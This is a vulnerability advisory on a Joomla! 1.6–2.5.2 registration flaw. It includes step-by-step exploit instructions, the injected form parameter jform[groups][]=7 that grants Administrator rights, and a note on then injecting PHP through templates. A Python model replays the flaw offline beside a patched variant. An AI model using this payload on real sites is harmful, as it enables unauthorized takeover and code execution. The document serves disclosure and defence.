Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability

Source: http://www.wooyun.org/bugs/wooyun-2010-05526

Joomla! 1.6.x/1.7.x/2.5.0-2.5.2 suffers from a privilege escalation vulnerability that allows a self-registering user to be placed into any group that does not hold the 'core.admin' permission. On a stock install only the 'Super Users' group holds 'core.admin', so every other group, including 'Administrator', is reachable.

In order to exploit it, an attacker visits index.php?option=com_users&view=registration and starts creating a new user. On the first submission the attacker must make the registration fail, either by NOT entering the same password in both password fields or by deliberately failing the captcha (in 2.5.x). Before submitting the form, the attacker uses Firebug or Tamper Data to add the following parameter to the form data (assuming the site still has the default user groups, in which ID 7 is the "Administrator" group):

  • Firebug: <input name="jform[groups][]" value="7" />
  • Tamper Data: jform[groups][]=7

The form reloads, complaining that the passwords didn't match. As a side effect, the submitted data, including the injected group, is stored in the session as form data. Submitting the form again with valid password values (and the injected parameter re-added) now assigns the newly registered user to the "Administrator" group: the user registration model re-binds the user to any group found in the session form data, while the groups given directly in the request are NOT honoured. That is why the failed first submission is required.
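The two-step sequence above, replayed against a small in-memory model of the registration flow. This is an added illustration and not Joomla!'s own code: the class, function and session-key names and the behaviour of the "patched" mode are assumptions chosen to mirror the description (the form filter drops the unknown `jform[groups][]` field, a failed submission stashes the raw request in the session, and a successful one binds whatever groups the session copy still carries). Group IDs follow Joomla!'s default groups (2 = Registered, 7 = Administrator).

```python
# Added illustration of the registration flaw described above. NOT Joomla! code:
# a small in-memory stand-in for the com_users registration controller/model so
# the two-step sequence can be replayed offline. Names (RegistrationModel,
# SESSION_KEY, the patched flag) are assumptions; the group ids follow the
# default Joomla! groups: 2 = Registered, 7 = Administrator.

REGISTERED_GROUP = 2      # group the 'new_usertype' option points to on a stock install
ADMINISTRATOR_GROUP = 7   # default 'Administrator' group id

# Fields declared in the registration form; JForm-style filtering drops anything else,
# so a 'groups' key never survives validation of a single request.
FORM_FIELDS = ("name", "username", "email1", "password1", "password2")

SESSION_KEY = "com_users.registration.data"


class RegistrationModel:
    """Stand-in for the registration flow. patched=False reproduces the bug."""

    def __init__(self, patched=False):
        self.patched = patched
        self.session = {}   # per-visitor user state (what setUserState() would hold)
        self.users = {}     # username -> list of group ids

    @staticmethod
    def _filter(raw):
        # Only declared form fields pass; 'groups' is silently discarded here.
        return {k: v for k, v in raw.items() if k in FORM_FIELDS}

    @staticmethod
    def _validate(data):
        errors = []
        for field in ("name", "username", "email1", "password1"):
            if not data.get(field):
                errors.append("missing %s" % field)
        if data.get("password1") != data.get("password2"):
            errors.append("passwords do not match")
        return errors

    def submit(self, raw):
        """Handle one POST of the registration form. Returns (ok, groups_or_errors)."""
        filtered = self._filter(raw)
        errors = self._validate(filtered)
        if errors:
            # The form is re-displayed with the submitted values. The vulnerable
            # flow stashes the *unfiltered* request, so jform[groups][] rides along.
            self.session[SESSION_KEY] = filtered if self.patched else dict(raw)
            return False, errors

        # Bind: start from whatever the session holds, then overlay the validated
        # fields. A key that exists only in the session copy survives untouched.
        data = dict(self.session.get(SESSION_KEY, {}))
        data.update(filtered)

        if self.patched:
            groups = []                        # never take group ids from client data
        else:
            groups = list(data.get("groups", []))   # <-- the bug: session-supplied groups
        groups.append(REGISTERED_GROUP)        # the configured default group is appended

        self.users[data["username"]] = groups
        self.session.pop(SESSION_KEY, None)
        return True, groups


def run_escalation(model):
    """Replay the advisory's two-step sequence against `model` (constructed input)."""
    base = {"name": "Mallory", "username": "mallory", "email1": "mallory@example.invalid"}
    # Step 1: mismatched passwords plus the injected jform[groups][]=7 field.
    first = dict(base, password1="secret-A", password2="secret-B",
                 groups=[ADMINISTRATOR_GROUP])
    ok, _ = model.submit(first)
    assert not ok, "step 1 must fail validation so the raw data lands in the session"
    # Step 2: matching passwords. The injected field is filtered out of *this*
    # request, but the copy stashed by step 1 is still in the session.
    second = dict(base, password1="secret-A", password2="secret-A",
                  groups=[ADMINISTRATOR_GROUP])
    return model.submit(second)


if __name__ == "__main__":
    print("vulnerable:", run_escalation(RegistrationModel(patched=False)))  # (True, [7, 2])
    print("patched:   ", run_escalation(RegistrationModel(patched=True)))   # (True, [2])
```

A single well-formed request carrying `groups=[7]` does not escalate in this model, which matches the advisory's note that groups given directly in the request are not honoured; only the copy left behind by a failed submission is. The "patched" mode shows the two checks that close the hole: store only filtered data in the session, and reset the group list to the configured default before binding.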

After activating the account, the attacker has a valid account that can log in to the administrator/ interface, edit one of the templates and inject PHP code (assuming the stock permissions and user groups are still in effect). Joomla! 1.6.x and 1.7.x additionally allow members of the "Administrator" group to install extensions, which opens another avenue for code execution.

Joomla! versions 1.0.x, 1.5.x, and 2.5.3+ are not vulnerable. No patch has been issued for 1.6.x or 1.7.x and users of these versions are strongly urged to upgrade to 2.5.3 immediately.

Timeline

  • Vendor Notified: 11 March 2012
  • Vendor Response: 11 March 2012
  • Update Available: 15 March 2012
  • Disclosure: 15 March 2012